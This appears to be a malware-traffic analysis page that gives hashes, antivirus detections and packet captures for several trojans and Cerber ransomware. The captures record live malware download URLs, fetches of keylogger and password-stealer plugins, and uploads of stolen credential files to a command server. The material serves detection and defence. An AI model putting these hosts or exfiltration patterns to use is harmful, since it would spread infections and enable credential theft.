Graftor Malware Trojan zanab.exe POST /poon/post.php www.gongotree.com Traffic Sample PCAP file Download

SHA256: 8fd5bcadd9ae6b1875024f1d5ca24a579727905f440600631ec972712f28c3f5
File name: zanab.exe
Detection ratio: 41 / 55
Analysis date: 2017-01-24 02:48:20 UTC ( 0 minutes ago )
ALYac Gen:Variant.Graftor.318298 20170123
AVG Luhe.Packed.C 20170123
AVware Trojan.Win32.Generic!BT 20170124
Ad-Aware Gen:Variant.Graftor.318298 20170124
AegisLab W32.W.Otwycal.l6ei 20170123
AhnLab-V3 Trojan/Win32.Fsysna.C1743112 20170123
Antiy-AVL Trojan/Win32.Fsysna 20170124
Arcabit Trojan.Graftor.D4DB5A 20170124
Avast Win32:Malware-gen 20170124
Avira (no cloud) DR/Delphi.bsqgm 20170123
BitDefender Gen:Variant.Graftor.318298 20170124
CAT-QuickHeal (Suspicious) – DNAScan 20170123
Comodo TrojWare.Win32.Spy.Banker.Gen 20170124
CrowdStrike Falcon (ML) malicious_confidence_83% (W) 20161024
Cyren W32/SysVenFak.A.gen!Eldorado 20170124
DrWeb Trojan.DownLoader14.15241 20170124
ESET-NOD32 a variant of Win32/Injector.DJNW 20170124
Emsisoft Gen:Variant.Graftor.318298 (B) 20170124
F-Prot W32/SysVenFak.A.gen!Eldorado 20170124

2017-01-23 21:08:29.692015 IP 192.168.1.102.50506 > 46.173.219.26.80: Flags [P.], seq 0:289, ack 1, win 259, length 289: HTTP: GET /utu/zanab.exe HTTP/1.1
E..I.p@….i…f…..J.P.c.;J.?lP…J…GET /utu/zanab.exe HTTP/1.1
Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Accept-Encoding: gzip, deflate
Host: gongotree.com
Connection: Keep-Alive

2017-01-23 21:08:48.852699 IP 192.168.1.102.65517 > 75.75.75.75.53: 49466+ A? www.gongotree.com. (35)
E..?i…..x}…fKKKK…5.+:..:………..www    gongotree.com…..
2017-01-23 21:08:49.262241 IP 192.168.1.102.50507 > 46.173.219.26.80: Flags [S], seq 318064516, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4..@….>…f…..K.P..G……. .c%…………..
2017-01-23 21:08:49.430597 IP 192.168.1.102.50507 > 46.173.219.26.80: Flags [.], ack 1051249154, win 259, length 0
E..(..@….I…f…..K.P..G.>…P….:……..
2017-01-23 21:08:49.431268 IP 192.168.1.102.50507 > 46.173.219.26.80: Flags [P.], seq 0:213, ack 1, win 259, length 213: HTTP: GET /poon/plugins/keylogger.p HTTP/1.1
E…..@….s…f…..K.P..G.>…P…….GET /poon/plugins/keylogger.p HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0)
Host: www.gongotree.com
Connection: Keep-Alive

2017-01-23 21:08:53.294595 IP 192.168.1.102.50507 > 46.173.219.26.80: Flags [P.], seq 213:298, ack 32961, win 254, length 85: HTTP: GET /poon/plugins/ftp.p HTTP/1.1
E..}..@……..f…..K.P..HZ>.J.P….)..GET /poon/plugins/ftp.p HTTP/1.1
User-Agent: vb wininet
Host: www.gongotree.com

2017-01-23 21:08:57.412231 IP 192.168.1.102.50508 > 46.173.219.26.80: Flags [P.], seq 0:371, ack 1, win 259, length 371: HTTP: POST /poon/post.php?pl=&slots=1 HTTP/1.1
E…..@……..f…..L.P]…(…P…….POST /poon/post.php?pl=&slots=1 HTTP/1.1
Content-Type: multipart/form-data; boundary=Xu02=$
Content-Length: 121
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: www.gongotree.com
Connection: Keep-Alive

–Xu02=$
Content-Disposition: form-data; name=”upload1″; filename=”FTP-BCC017C5.txt”
Content-type: file

–Xu02=$–
2017-01-23 21:08:58.096953 IP 192.168.1.102.50508 > 46.173.219.26.80: Flags [.], ack 394, win 257, length 0
E..(..@….#…f…..L.P]..T(…P….X……..
2017-01-23 21:09:01.107016 IP 192.168.1.102.50507 > 46.173.219.26.80: Flags [P.], seq 298:384, ack 49537, win 259, length 86: HTTP: GET /poon/plugins/mail.p HTTP/1.1
E..~..@……..f…..K.P..H.>…P….K..GET /poon/plugins/mail.p HTTP/1.1
User-Agent: vb wininet
Host: www.gongotree.com

2017-01-23 21:09:05.220043 IP 192.168.1.102.50508 > 46.173.219.26.80: Flags [P.], seq 371:743, ack 394, win 257, length 372: HTTP: POST /poon/post.php?pl=&slots=1 HTTP/1.1
E…..@……..f…..L.P]..T(…P…….POST /poon/post.php?pl=&slots=1 HTTP/1.1
Content-Type: multipart/form-data; boundary=Xu02=$
Content-Length: 122
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: www.gongotree.com
Connection: Keep-Alive

–Xu02=$
Content-Disposition: form-data; name=”upload1″; filename=”MAIL-BCC017C5.TxT”
Content-type: file

–Xu02=$–
2017-01-23 21:09:05.801224 IP 192.168.1.102.50508 > 46.173.219.26.80: Flags [.], ack 787, win 256, length 0
E..(..@……..f…..L.P]…(..”P….\……..
2017-01-23 21:09:06.944920 IP 192.168.1.102.49725 > 75.75.75.75.53: 57531+ A? www.googleapis.com. (36)
E..@i…..xz…fKKKK.=.5.,.P………….www
googleapis.com…..
2017-01-23 21:09:08.751880 IP 192.168.1.102.50507 > 46.173.219.26.80: Flags [P.], seq 384:475, ack 106657, win 259, length 91: HTTP: GET /poon/plugins/passwords.p HTTP/1.1
E…..@……..f…..K.P..I.>.j.P…:^..GET /poon/plugins/passwords.p HTTP/1.1
User-Agent: vb wininet
Host: www.gongotree.com

2017-01-23 21:09:14.342485 IP 192.168.1.102.50508 > 46.173.219.26.80: Flags [P.], seq 743:1113, ack 787, win 256, length 370: HTTP: POST /poon/post.php?pl=&slots=1 HTTP/1.1
E….:@….N…f…..L.P]…(..”P…0r..POST /poon/post.php?pl=&slots=1 HTTP/1.1
Content-Type: multipart/form-data; boundary=Xu02=$
Content-Length: 120
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: www.gongotree.com
Connection: Keep-Alive

–Xu02=$
Content-Disposition: form-data; name=”upload1″; filename=”PW-BCC017C5.LOG”
Content-type: file

–Xu02=$–
2017-01-23 21:09:16.475901 IP 192.168.1.102.50508 > 46.173.219.26.80: Flags [.], ack 1180, win 254, length 0
E..(.;@……..f…..L.P]..:(…P….c……..
2017-01-23 21:09:20.641990 IP 192.168.1.102.59592 > 75.75.75.75.53: 8551+ A? oem.twimg.com. (31)
E..;i…..x{…fKKKK…5.’..!g………..oem.twimg.com…..
2017-01-23 21:09:20.641998 IP 192.168.1.102.64219 > 75.75.75.75.53: 4920+ A? cdn.content.prod.cms.msn.com. (46)
E..Ji…..xk…fKKKK…5.6x..8………..cdn.content.prod.cms.msn.com…..
2017-01-23 21:09:20.659012 IP 192.168.1.102.64219 > 75.75.76.76.53: 4920+ A? cdn.content.prod.cms.msn.com. (46)
E..JS……….fKKLL…5.6w..8………..cdn.content.prod.cms.msn.com…..
2017-01-23 21:09:20.659020 IP 192.168.1.102.59592 > 75.75.76.76.53: 8551+ A? oem.twimg.com. (31)
E..;S……….fKKLL…5.’..!g………..oem.twimg.com…..
2017-01-23 21:09:23.439161 IP 192.168.1.102.50506 > 46.173.219.26.80: Flags [.], ack 870606, win 1349, length 0
E..(.<@……..f…..J.P.c.\J..9P..E……….
2017-01-23 21:09:23.770262 IP 192.168.1.102.50506 > 46.173.219.26.80: Flags [F.], seq 289, ack 870606, win 1349, length 0
E..(.=@……..f…..J.P.c.\J..9P..E……….
2017-01-23 21:09:36.598111 IP 192.168.1.102.50508 > 46.173.219.26.80: Flags [P.], seq 1113:1263, ack 1180, win 254, length 150: HTTP: GET /poon/ HTTP/1.1
E….>@….&…f…..L.P]..:(…P…e_..GET /poon/ HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MyApp 1.0; Windows NT 5.1)
Accept: */*
Host: www.gongotree.com
Connection: Keep-Alive

sub.exe totalwellbeing.com.au Cerber Ransomware Trojan Malware PCAP file download traffic sample

SHA256: 849aa2e275d84c05213f95f764331df0dd743b17b32f61174ac45946544f67eb
File name: sub.exe
Detection ratio: 16 / 55
Analysis date: 2017-01-24 02:42:52 UTC ( 0 minutes ago )
Avast Win32:Malware-gen 20170124
Avira (no cloud) TR/Crypt.Xpack.gsrsm 20170123
CrowdStrike Falcon (ML) malicious_confidence_76% (W) 20161024
DrWeb Trojan.Encoder.5994 20170124
ESET-NOD32 NSIS/Injector.SH 20170124
GData Win32.Trojan.Agent.XY7YM7 20170124
Invincea ransom.win32.critroni.b 20170111
Kaspersky Trojan-Ransom.Win32.Zerber.bghv 20170124
Malwarebytes Ransom.Cerber 20170124
McAfee Artemis!130678330541 20170124
McAfee-GW-Edition BehavesLike.Win32.ObfusRansom.fc 20170124
Rising Trojan.Injector!8.C4-pKe2N6RHzqF (cloud) 20170124
Sophos Mal/Generic-S 20170124
Symantec ML.Attribute.VeryHighConfidence [Heur.AdvML.B] 20170123

2017-01-23 20:55:04.860000 IP 192.168.1.102.50480 > 162.214.17.204.80: Flags [P.], seq 0:314, ack 1, win 256, length 314: HTTP: GET /wp-includes/images/wlw/sub.exe HTTP/1.1
E..b5.@…L….f…..0.P.M.`\.j\P….|..GET /wp-includes/images/wlw/sub.exe HTTP/1.1
Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Accept-Encoding: gzip, deflate
Host: totalwellbeing.com.au
Connection: Keep-Alive

2017-01-23 20:55:18.692931 IP 192.168.1.102.57682 > 90.2.1.0.6892: UDP, length 25
E..5………..fZ….R…!.,df9e07b4fa6400684501000dd
2017-01-23 20:55:18.692999 IP 192.168.1.102.57682 > 90.2.1.1.6892: UDP, length 25
E..5D……….fZ….R…!.+df9e07b4fa6400684501000dd
2017-01-23 20:55:18.693053 IP 192.168.1.102.57682 > 90.2.1.2.6892: UDP, length 25
E..5-F….._…fZ….R…!.*df9e07b4fa6400684501000dd
2017-01-23 20:55:18.693059 IP 192.168.1.102.57682 > 90.2.1.3.6892: UDP, length 25
E..5c……….fZ….R…!.)df9e07b4fa6400684501000dd
2017-01-23 20:55:18.693141 IP 192.168.1.102.57682 > 90.2.1.4.6892: UDP, length 25
E..5Y:…..i…fZ….R…!.(df9e07b4fa6400684501000dd
2017-01-23 20:55:18.693198 IP 192.168.1.102.57682 > 90.2.1.5.6892: UDP, length 25
E..5………..fZ….R…!.’df9e07b4fa6400684501000dd
2017-01-23 20:55:18.693250 IP 192.168.1.102.57682 > 90.2.1.6.6892: UDP, length 25
E..5.p…..1…fZ….R…!.&df9e07b4fa6400684501000dd
2017-01-23 20:55:18.693255 IP 192.168.1.102.57682 > 90.2.1.7.6892: UDP, length 25
E..51……….fZ….R…!.%df9e07b4fa6400684501000dd
2017-01-23 20:55:18.693336 IP 192.168.1.102.57682 > 90.2.1.8.6892: UDP, length 25
E..5c7…..h…fZ….R…!.$df9e07b4fa6400684501000dd
2017-01-23 20:55:18.693383 IP 192.168.1.102.57682 > 90.2.1.9.6892: UDP, length 25
E..5-……….fZ..     .R…!.#df9e07b4fa6400684501000dd
2017-01-23 20:55:18.693442 IP 192.168.1.102.57682 > 90.2.1.10.6892: UDP, length 25
E..5E}….. …fZ..
.R…!.”df9e07b4fa6400684501000dd
2017-01-23 20:55:18.693492 IP 192.168.1.102.57682 > 90.2.1.11.6892: UDP, length 25
E..5………..fZ….R…!.!df9e07b4fa6400684501000dd
2017-01-23 20:55:18.693493 IP 192.168.1.102.57682 > 90.2.1.12.6892: UDP, length 25
E..51……….fZ….R…!. df9e07b4fa6400684501000dd
2017-01-23 20:55:18.693581 IP 192.168.1.102.57682 > 90.2.1.13.6892: UDP, length 25
E..5………..fZ….R…!..df9e07b4fa6400684501000dd
2017-01-23 20:55:18.693631 IP 192.168.1.102.57682 > 90.2.1.14.6892: UDP, length 25
E..5.k…../…fZ….R…!..df9e07b4fa6400684501000dd
2017-01-23 20:55:18.693633 IP 192.168.1.102.57682 > 90.2.1.15.6892: UDP, length 25
E..5Y……….fZ….R…!..df9e07b4fa6400684501000dd
2017-01-23 20:55:18.693715 IP 192.168.1.102.57682 > 90.2.1.16.6892: UDP, length 25
E..5@3…..d…fZ….R…!..df9e07b4fa6400684501000dd
2017-01-23 20:55:18.693774 IP 192.168.1.102.57682 > 90.2.1.17.6892: UDP, length 25
E..5p……….fZ….R…!..df9e07b4fa6400684501000dd
2017-01-23 20:55:18.693776 IP 192.168.1.102.57682 > 90.2.1.18.6892: UDP, length 25
E..5………..fZ….R…!..df9e07b4fa6400684501000dd
2017-01-23 20:55:18.693843 IP 192.168.1.102.57682 > 90.2.1.19.6892: UDP, length 25
E..5X……{…fZ….R…!..df9e07b4fa6400684501000dd

2017-01-23 20:55:19.683716 IP 192.168.1.102.57682 > 91.239.25.242.6892: UDP, length 25
E..5R……….f[….R…!oMdf9e07b4fa6400684501000dd
2017-01-23 20:55:19.683720 IP 192.168.1.102.57682 > 91.239.25.243.6892: UDP, length 25
E..5…….:…f[….R…!oLdf9e07b4fa6400684501000dd
2017-01-23 20:55:19.683799 IP 192.168.1.102.57682 > 91.239.25.244.6892: UDP, length 25
E..5>……….f[….R…!oKdf9e07b4fa6400684501000dd
2017-01-23 20:55:19.683849 IP 192.168.1.102.57682 > 91.239.25.245.6892: UDP, length 25
E..5…….(…f[….R…!oJdf9e07b4fa6400684501000dd
2017-01-23 20:55:19.683901 IP 192.168.1.102.57682 > 91.239.25.246.6892: UDP, length 25
E..5%……….f[….R…!oIdf9e07b4fa6400684501000dd
2017-01-23 20:55:19.683905 IP 192.168.1.102.57682 > 91.239.25.247.6892: UDP, length 25
E..5fk…..X…f[….R…!oHdf9e07b4fa6400684501000dd
2017-01-23 20:55:19.683957 IP 192.168.1.102.57682 > 91.239.25.248.6892: UDP, length 25
E..5………..f[….R…!oGdf9e07b4fa6400684501000dd
2017-01-23 20:55:19.684030 IP 192.168.1.102.57682 > 91.239.25.249.6892: UDP, length 25
E..5S……….f[….R…!oFdf9e07b4fa6400684501000dd
2017-01-23 20:55:19.684085 IP 192.168.1.102.57682 > 91.239.25.250.6892: UDP, length 25
E..5;……….f[….R…!oEdf9e07b4fa6400684501000dd
2017-01-23 20:55:19.684090 IP 192.168.1.102.57682 > 91.239.25.251.6892: UDP, length 25
E..5ph…..W…f[….R…!oDdf9e07b4fa6400684501000dd
2017-01-23 20:55:19.684136 IP 192.168.1.102.57682 > 91.239.25.252.6892: UDP, length 25
E..5g……….f[….R…!oCdf9e07b4fa6400684501000dd
2017-01-23 20:55:19.684196 IP 192.168.1.102.57682 > 91.239.25.253.6892: UDP, length 25
E..5$\…..a…f[….R…!oBdf9e07b4fa6400684501000dd
2017-01-23 20:55:19.684259 IP 192.168.1.102.57682 > 91.239.25.254.6892: UDP, length 25
E..5.8………f[….R…!oAdf9e07b4fa6400684501000dd
2017-01-23 20:55:20.688939 IP 192.168.1.102.57682 > 91.239.25.255.6892: UDP, length 25
E..5?……9…f[….R…!o@df9e07b4fa6400684501000dd

Jadtre Unknown Malware Trojan Traffic Analysis PCAP file download sample mbfce24rgn65bx3g.er29sl.com

SHA256: 065fdaa90c06c60f77fcae1420b1612eb266e55bbd417f60cedd33014be30529
File name: read.php?f=0.dat
Detection ratio: 5 / 55
Analysis date: 2017-01-24 02:35:57 UTC ( 0 minutes ago )

 

Baidu Win32.Trojan.WisdomEyes.16070401.9500.9995 20170123
CrowdStrike Falcon (ML) malicious_confidence_100% (D) 20161024
ESET-NOD32 a variant of Win32/GenKryptik.RZM 20170124
Fortinet W32/Kryptik.FNGP!tr 20170124
Invincea virus.win32.jadtre.b 20170111

2017-01-23 20:52:10.544193 IP 192.168.1.102.50465 > 54.165.109.229.80: Flags [P.], seq 0:292, ack 1, win 256, length 292: HTTP: GET /read.php?f=0.dat HTTP/1.1
E..Lj.@…(….f6.m..!.P….k   ~.P…….GET /read.php?f=0.dat HTTP/1.1
Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Accept-Encoding: gzip, deflate
Host: smoeroota.top
Connection: Keep-Alive

2017-01-23 20:52:40.577524 IP 192.168.1.102.63681 > 75.75.75.75.53: 49466+ A? mbfce24rgn65bx3g.rzunt3u2.com. (47)
E..Kh…..y     …fKKKK…5.7…:………..mbfce24rgn65bx3g.rzunt3u2.com…..
2017-01-23 20:52:42.546840 IP 192.168.1.102.63682 > 75.75.75.75.53: 49466+ A? mbfce24rgn65bx3g.rzunt3u2.com. (47)
E..Kh…..y….fKKKK…5.7…:………..mbfce24rgn65bx3g.rzunt3u2.com…..
2017-01-23 20:52:42.577669 IP 192.168.1.102.63681 > 75.75.75.75.53: 49466+ A? mbfce24rgn65bx3g.rzunt3u2.com. (47)
E..Kh…..y….fKKKK…5.7…:………..mbfce24rgn65bx3g.rzunt3u2.com…..
2017-01-23 20:52:43.189174 IP 192.168.1.102.58262 > 75.75.75.75.53: 3995+ A? mbfce24rgn65bx3g.rzunt3u2.com.hsd1.md.comcast.net. (67)
E.._h…..x….fKKKK…5.K……………mbfce24rgn65bx3g.rzunt3u2.com.hsd1.md.comcast.net…..
2017-01-23 20:52:43.219805 IP 192.168.1.102.58262 > 75.75.76.76.53: 3995+ A? mbfce24rgn65bx3g.rzunt3u2.com.hsd1.md.comcast.net. (67)
E.._Rh………fKKLL…5.K……………mbfce24rgn65bx3g.rzunt3u2.com.hsd1.md.comcast.net…..
2017-01-23 20:52:43.262040 IP 192.168.1.102.58263 > 75.75.75.75.53: 60265+ A? mbfce24rgn65bx3g.rzunt3u2.com. (47)
E..Kh…..y….fKKKK…5.7…i………..mbfce24rgn65bx3g.rzunt3u2.com…..
2017-01-23 20:52:44.261950 IP 192.168.1.102.58264 > 75.75.75.75.53: 60265+ A? mbfce24rgn65bx3g.rzunt3u2.com. (47)
E..Kh…..y….fKKKK…5.7…i………..mbfce24rgn65bx3g.rzunt3u2.com…..
2017-01-23 20:52:44.286235 IP 192.168.1.102.58265 > 75.75.75.75.53: 56789+ A? mbfce24rgn65bx3g.rzunt3u2.com. (47)
E..Kh…..y….fKKKK…5.7.m………….mbfce24rgn65bx3g.rzunt3u2.com…..
2017-01-23 20:52:44.558174 IP 192.168.1.102.63682 > 75.75.75.75.53: 49466+ A? mbfce24rgn65bx3g.rzunt3u2.com. (47)
E..Kh…..y….fKKKK…5.7…:………..mbfce24rgn65bx3g.rzunt3u2.com…..
2017-01-23 20:52:45.277355 IP 192.168.1.102.58263 > 75.75.76.76.53: 60265+ A? mbfce24rgn65bx3g.rzunt3u2.com. (47)
E..KRm………fKKLL…5.7…i………..mbfce24rgn65bx3g.rzunt3u2.com…..
2017-01-23 20:52:45.277609 IP 192.168.1.102.58266 > 75.75.75.75.53: 56789+ A? mbfce24rgn65bx3g.rzunt3u2.com. (47)
E..Kh…..x….fKKKK…5.7.l………….mbfce24rgn65bx3g.rzunt3u2.com…..
2017-01-23 20:52:45.413254 IP 192.168.1.102.58267 > 75.75.75.75.53: 65171+ A? mbfce24rgn65bx3g.er29sl.com. (45)
E..Ih…..y….fKKKK…5.5E…………..mbfce24rgn65bx3g.er29sl.com…..
2017-01-23 20:52:45.719634 IP 192.168.1.102.50468 > 54.175.146.166.80: Flags [S], seq 1019927426, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4qg@……..f6….$.P<……… ……………..
2017-01-23 20:52:45.754349 IP 192.168.1.102.50468 > 54.175.146.166.80: Flags [.], ack 853700286, win 256, length 0
E..(qh@……..f6….$.P<…2.n.P………….
2017-01-23 20:52:45.756985 IP 192.168.1.102.50468 > 54.175.146.166.80: Flags [P.], seq 0:94, ack 1, win 256, length 94: HTTP: POST / HTTP/1.1
E…qi@……..f6….$.P<…2.n.P…l|..POST / HTTP/1.1
Host: mbfce24rgn65bx3g.er29sl.com
Content-Length: 167
Connection: close

DICVFL.exe Trojan Downloader Malware Traffic Analysis Sample PCAP file download

SHA256: 2933b492fec30500750c3d5f598bf99fdf976e15dbc8895393b94a91233bd7fc
File name: DICVFL.exe
Detection ratio: 25 / 55
Analysis date: 2017-01-24 02:29:56 UTC ( 0 minutes ago )
Ad-Aware Trojan.GenericKD.4218289 20170124
AegisLab Ml.Attribute.Veryhighconfidence.[Heur.Advml!c 20170123
AhnLab-V3 Trojan/Win32.Autoit.C1702709 20170123
Arcabit Trojan.Generic.D405DB1 20170124
Avast Other:Malware-gen [Trj] 20170124
Baidu Win32.Trojan.WisdomEyes.16070401.9500.9784 20170123
BitDefender Trojan.GenericKD.4218289 20170124
CMC Trojan.Win32.Generic!O 20170123
CrowdStrike Falcon (ML) malicious_confidence_75% (W) 20161024
DrWeb Trojan.DownLoader23.48840 20170124
Emsisoft Trojan.GenericKD.4218289 (B) 20170124
F-Secure Trojan.GenericKD.4218289 20170124
GData Trojan.GenericKD.4218289 20170124
Ikarus Trojan.Inject 20170123
Invincea worm.win32.moarider.a 20170111
K7AntiVirus Trojan ( 004b8bad1 ) 20170123
K7GW Trojan ( 004b8bad1 ) 20170124
Kaspersky Trojan-PSW.Win32.Autoit.et 20170124
Malwarebytes Backdoor.Bot 20170124
eScan Trojan.GenericKD.4218289 20170124

2017-01-23 20:49:50.377649 IP 192.168.1.102.50454 > 216.158.236.123.80: Flags [P.], seq 0:299, ack 1, win 256, length 299: HTTP: GET /888/micro/DICVFL.exe HTTP/1.1
E..S=.@…4….f…{…PuC3..9Z.P….$..GET /888/micro/DICVFL.exe HTTP/1.1
Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Accept-Encoding: gzip, deflate
Host: lascofittings.cf
Connection: Keep-Alive

2017-01-23 20:49:58.172216 IP 192.168.1.102.50455 > 213.183.58.12.2082: Flags [S], seq 3473220687, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4,.@……..f..:….”..$O…… ……………..
2017-01-23 20:49:58.668336 IP 192.168.1.102.50454 > 216.158.236.123.80: Flags [F.], seq 299, ack 482841, win 891, length 0
E..(>H@…5_…f…{…PuC5
.@..P..{
|……..
2017-01-23 20:50:01.183928 IP 192.168.1.102.50455 > 213.183.58.12.2082: Flags [S], seq 3473220687, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4, @……..f..:….”..$O…… ……………..
2017-01-23 20:50:07.198638 IP 192.168.1.102.50455 > 213.183.58.12.2082: Flags [S], seq 3473220687, win 65535, options [mss 1460,nop,nop,sackOK], length 0
E..0,!@……..f..:….”..$O….p……………
2017-01-23 20:50:13.670429 IP 192.168.1.102.50445 > 104.146.164.25.443: Flags [F.], seq 1554793646, ack 1155943388, win 256, length 0
E..(5.@….R…fh…….\.D.D.K.P….3……..
2017-01-23 20:50:13.670663 IP 192.168.1.102.50442 > 104.146.164.25.443: Flags [F.], seq 814848555, ack 2286363549, win 256, length 0
E..(5.@….Q…fh….
..0..+.G#.P………….
2017-01-23 20:50:13.670780 IP 192.168.1.102.50446 > 104.146.164.25.443: Flags [F.], seq 883426129, ack 374204385, win 256, length 0
E..(5.@….P…fh…….4..Q.M..P….’……..
2017-01-23 20:50:13.670955 IP 192.168.1.102.50439 > 104.146.164.25.443: Flags [F.], seq 1363039211, ack 2644039456, win 256, length 0
E..(5.@….O…fh…….Q>S…. P….s……..
2017-01-23 20:50:13.964345 IP 192.168.1.102.50439 > 104.146.164.25.443: Flags [.], ack 2, win 256, length 0
E..(5.@….N…fh…….Q>S….!P….r……..
2017-01-23 20:50:13.965415 IP 192.168.1.102.50446 > 104.146.164.25.443: Flags [.], ack 2, win 256, length 0
E..(5.@….M…fh…….4..R.M..P….&……..
2017-01-23 20:50:13.966452 IP 192.168.1.102.50445 > 104.146.164.25.443: Flags [.], ack 2, win 256, length 0
E..(5.@….L…fh…….\.D.D.K.P….2……..
2017-01-23 20:50:13.970768 IP 192.168.1.102.50442 > 104.146.164.25.443: Flags [.], ack 2, win 256, length 0
E..(5.@….K…fh….
..0..,.G#.P………….
2017-01-23 20:50:19.120859 IP 192.168.1.102.50460 > 213.183.58.12.2082: Flags [S], seq 3964598830, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4,”@……..f..:….”.N…….. ……………..
2017-01-23 20:50:22.135768 IP 192.168.1.102.50460 > 213.183.58.12.2082: Flags [S], seq 3964598830, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4,#@……..f..:….”.N…….. ……………..
2017-01-23 20:50:28.137285 IP 192.168.1.102.50460 > 213.183.58.12.2082: Flags [S], seq 3964598830, win 65535, options [mss 1460,nop,nop,sackOK], length 0
E..0,$@……..f..:….”.N……p……………

Symmi Slingup Dapato Malware Trojan Traffic Analysis PCAP file download sample

SHA256: 965756c5a1d67fca84a92b49fa346627a72327ebee621fd4f81f3296ddc39c74
File name: beta.exe
Detection ratio: 43 / 55
Analysis date: 2017-01-24 02:26:16 UTC ( 0 minutes ago )
AVware Trojan.Win32.Generic!BT 20170124
Ad-Aware Gen:Variant.Symmi.69617 20170124
AegisLab W32.W.Otwycal.l6ei 20170123
AhnLab-V3 Trojan/Win32.Fareit.R193567 20170123
Antiy-AVL Trojan[Dropper]/Win32.Dapato 20170124
Arcabit Trojan.Symmi.D10FF1 20170124
Avast Win32:Malware-gen 20170124
Avira (no cloud) BDS/Slingup.aptxz 20170123
BitDefender Gen:Variant.Symmi.69617 20170124
CAT-QuickHeal Backdoor.Slingup 20170123
Comodo TrojWare.Win32.UMal.zhzcf 20170124
CrowdStrike Falcon (ML) malicious_confidence_80% (W) 20161024
DrWeb Trojan.DownLoader14.15241 20170124
ESET-NOD32 a variant of Win32/Injector.DJPB 20170124
Emsisoft Gen:Variant.Symmi.69617 (B) 20170124
F-Secure Gen:Variant.Symmi.69617 20170124
Fortinet W32/Injector.DJPB!tr 20170124

2017-01-23 21:10:34.244238 IP 192.168.1.102.50519 > 46.173.219.26.80: Flags [P.], seq 0:288, ack 1, win 259, length 288: HTTP: GET /utu/beta.exe HTTP/1.1
E..H.D@……..f…..W.P.X.9…,P…….GET /utu/beta.exe HTTP/1.1
Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Accept-Encoding: gzip, deflate
Host: gongotree.com
Connection: Keep-Alive

2017-01-23 21:18:52.669213 IP 192.168.1.102.50694 > 216.58.218.238.443: Flags [S], seq 2576574364, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4k.@……..f.:……..g……. ……………..
2017-01-23 21:18:52.705913 IP 192.168.1.102.50694 > 216.58.218.238.443: Flags [.], ack 4012597881, win 256, length 0
E..(k.@……..f.:……..g..+byP………….
2017-01-23 21:18:52.707025 IP 192.168.1.102.50694 > 216.58.218.238.443: Flags [P.], seq 0:77, ack 1, win 256, length 77
E..uk.@….g…f.:……..g..+byP………..H…D..X..H….8.l.V…DQ#m.        .0Q…#.,………
.       .d.b………c………
2017-01-23 21:18:52.730755 IP 192.168.1.102.50694 > 216.58.218.238.443: Flags [.], ack 2861, win 256, length 0
E..(k.@……..f.:……..g..+m.P………….
2017-01-23 21:18:52.732053 IP 192.168.1.102.50694 > 216.58.218.238.443: Flags [P.], seq 77:395, ack 4048, win 252, length 318
E..fk.@….t…f.:……..g..+rHP….n………….p…….Q…=..=.|…G.k0.i6……W^^1..s..q..uqv..@B…..1&.U…-…o$X…….q…….H.^…C~….-…      …..<…..A.a…i.*.e#rm …..-&W…f..b..{.. .J..
T…BR..B_.Crl…..Aa^_.Rs.?`#.m…>.<…”….G.Kr.^ ……H$.(.. .|8X..t..K…E….}…c.u.m…..^H:……….(.i….%…..Zi…….8…….
…c’….’
2017-01-23 21:18:52.817679 IP 192.168.1.102.50694 > 216.58.218.238.443: Flags [.], ack 4099, win 252, length 0
E..(k.@……..f.:……..i(.+r{P….|……..
2017-01-23 21:18:52.915817 IP 192.168.1.102.50694 > 216.58.218.238.443: Flags [P.], seq 395:1101, ack 4099, win 252, length 706
E…k.@……..f.:……..i(.+r{P………………….f3……….k……B..{. ……b….,…7jM.q……x..A…….uc..:>..qt*.tx.F……..B..=._.#P…..Q…u.@O..&……sCLN….V…….].6CKM….&..:…..y-…..l……{>&..M.8…x.P.V..C..z..H…v….iW.S….6.U.%<……-….z….}.’)*y…….w……;P.u……G.#V…;..;…..9z.o….X…….6u.K…’………….”Bl……a……….&…6.y.Z=D_.=.!……GC*Pg..p.[…^*._i._vj.09}H… ]..>……..70L.1G…..O.>,..”.8a”..u…..6..<e.K..{W)…B………x@.z.|.`..2f\,…..G@r….?..4.W.~.2.]..Js.2m..b”.k3″…C….h|..i..I.s.A.tu-./..$.j.X.[.c?..;j..5..o…XO…%7.e..Df…..2…..A……….;….=.;C..c9A.. d}.v.+….D+f………..dt….f.v`.!=.[S..lH…..m.J..P.4..(p..V.H..e…..4.f.Y….
2017-01-23 21:18:52.916417 IP 192.168.1.102.50694 > 216.58.218.238.443: Flags [P.], seq 1101:2561, ack 4099, win 252, length 1460
